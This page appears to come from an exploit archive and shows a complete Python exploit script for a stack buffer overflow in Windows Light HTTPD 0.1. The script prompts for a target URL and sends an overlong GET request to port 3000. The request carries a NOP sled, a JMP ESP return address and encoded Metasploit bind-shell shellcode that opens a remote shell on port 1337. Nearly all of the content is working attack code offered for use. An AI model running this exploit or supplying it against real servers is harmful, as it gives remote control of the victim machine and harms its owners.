exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Windows Light HTTPD 0.1 Buffer Overflow

Windows Light HTTPD 0.1 Buffer Overflow
Posted Apr 25, 2013
Authored by Jacob Holcomb

Windows Light HTTPD version 0.1 HTTP GET buffer overflow exploit that spawns a bindshell.

tags | exploit, web, overflow
systems | windows
SHA-256 | c6353474ef20863a17e6e60c49ab6d2415f53b3329ca89fc8312aa196928cdcd

Windows Light HTTPD 0.1 Buffer Overflow

Change Mirror Download
import urllib2
from time import sleep

#########################################################################################################################################
# Title************************Windows Light HTTPD v0.1 HTTP GET Buffer Overflow
# Discovered and Reported******24th of April, 2013
# Discovered/Exploited By******Jacob Holcomb/Gimppy042
# Software Vendor**************http://sourceforge.net/projects/lhttpd/?source=navbar
# Exploit/Advisory*************http://infosec42.blogspot.com/
# Software*********************Light HTTPD v0.1
# Tested Platform**************Windows XP Professional SP2
# Date*************************24/04/2013
#
#PS - This is a good piece of software to practice Stack Based Buffer Overflows if you curiouz and want to learnz
#########################################################################################################################################
# Exploit-DB Note: Offset 255 for Windows XP SP3
# jmp esp ntdll 0x7c31fcd8
# payload = "\x90" * 255 + "\xd8\xfc\x91\x7c" + "\x90" * 32 + shellcode

def targURL():

while True:

URL = raw_input("\n[*] Please enter the URL of the Light HTTP server you would like to PWN. Ex. http://192.168.1.1\n\n>")
if len(URL) != 0 and URL[0:7] == "http://":
break

else:
print "\n\n[!!!] Target URL cant be null and must contain http:// or https:// [!!!]\n"
sleep(1)

return str(URL)


def main():

target = targURL()
# msfpayload windows/shell_bind_tcp EXITFUNC=thread LPORT=1337 R | msfencode -c 1 -e x86/shikata_ga_nai -b "\x00\x0a\x0d\xff\x20" R
shellcode = "\xb8\x3b\xaf\xc1\x8a\xdb\xcd\xd9\x74\x24\xf4\x5a\x29\xc9"
shellcode += "\xb1\x56\x83\xc2\x04\x31\x42\x0f\x03\x42\x34\x4d\x34\x76"
shellcode += "\xa2\x18\xb7\x87\x32\x7b\x31\x62\x03\xa9\x25\xe6\x31\x7d"
shellcode += "\x2d\xaa\xb9\xf6\x63\x5f\x4a\x7a\xac\x50\xfb\x31\x8a\x5f"
shellcode += "\xfc\xf7\x12\x33\x3e\x99\xee\x4e\x12\x79\xce\x80\x67\x78"
shellcode += "\x17\xfc\x87\x28\xc0\x8a\x35\xdd\x65\xce\x85\xdc\xa9\x44"
shellcode += "\xb5\xa6\xcc\x9b\x41\x1d\xce\xcb\xf9\x2a\x98\xf3\x72\x74"
shellcode += "\x39\x05\x57\x66\x05\x4c\xdc\x5d\xfd\x4f\x34\xac\xfe\x61"
shellcode += "\x78\x63\xc1\x4d\x75\x7d\x05\x69\x65\x08\x7d\x89\x18\x0b"
shellcode += "\x46\xf3\xc6\x9e\x5b\x53\x8d\x39\xb8\x65\x42\xdf\x4b\x69"
shellcode += "\x2f\xab\x14\x6e\xae\x78\x2f\x8a\x3b\x7f\xe0\x1a\x7f\xa4"
shellcode += "\x24\x46\x24\xc5\x7d\x22\x8b\xfa\x9e\x8a\x74\x5f\xd4\x39"
shellcode += "\x61\xd9\xb7\x55\x46\xd4\x47\xa6\xc0\x6f\x3b\x94\x4f\xc4"
shellcode += "\xd3\x94\x18\xc2\x24\xda\x33\xb2\xbb\x25\xbb\xc3\x92\xe1"
shellcode += "\xef\x93\x8c\xc0\x8f\x7f\x4d\xec\x5a\x2f\x1d\x42\x34\x90"
shellcode += "\xcd\x22\xe4\x78\x04\xad\xdb\x99\x27\x67\x6a\x9e\xe9\x53"
shellcode += "\x3f\x49\x08\x64\xba\xb0\x85\x82\xae\xd2\xc3\x1d\x46\x11"
shellcode += "\x30\x96\xf1\x6a\x12\x8a\xaa\xfc\x2a\xc4\x6c\x02\xab\xc2"
shellcode += "\xdf\xaf\x03\x85\xab\xa3\x97\xb4\xac\xe9\xbf\xbf\x95\x7a"
shellcode += "\x35\xae\x54\x1a\x4a\xfb\x0e\xbf\xd9\x60\xce\xb6\xc1\x3e"
shellcode += "\x99\x9f\x34\x37\x4f\x32\x6e\xe1\x6d\xcf\xf6\xca\x35\x14"
shellcode += "\xcb\xd5\xb4\xd9\x77\xf2\xa6\x27\x77\xbe\x92\xf7\x2e\x68"
shellcode += "\x4c\xbe\x98\xda\x26\x68\x76\xb5\xae\xed\xb4\x06\xa8\xf1"
shellcode += "\x90\xf0\x54\x43\x4d\x45\x6b\x6c\x19\x41\x14\x90\xb9\xae"
shellcode += "\xcf\x10\xd9\x4c\xc5\x6c\x72\xc9\x8c\xcc\x1f\xea\x7b\x12"
shellcode += "\x26\x69\x89\xeb\xdd\x71\xf8\xee\x9a\x35\x11\x83\xb3\xd3"
shellcode += "\x15\x30\xb3\xf1"

#7C941EED FFE4 JMP ESP ntdll.dll
payload = "\x90" * 258 + "\xED\x1E\x94\x7C" + "\x90" * 32 + shellcode
port = ":3000/"
sploit = target + port + payload

try:
print "\n[*] Preparing to send Evil PAYLoAd to %s!\n[*] Payload Length: %d\n[*] Waiting..." % (target[7:], len(sploit))
httpRequest = urllib2.Request(sploit)
sploit = urllib2.urlopen(httpRequest, None, 6)
except(urllib2.URLError):
print "\n[!!!] Error. Please check that the Light HTTP Server is online [!!!]\n"
except:
print "\n[!!!] The server did not respond, but the payload was sent. F!ng3r$ Cr0$$3d 4 c0d3 Ex3cut!0n! [!!!]\n"



if __name__ == "__main__":
main()

Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close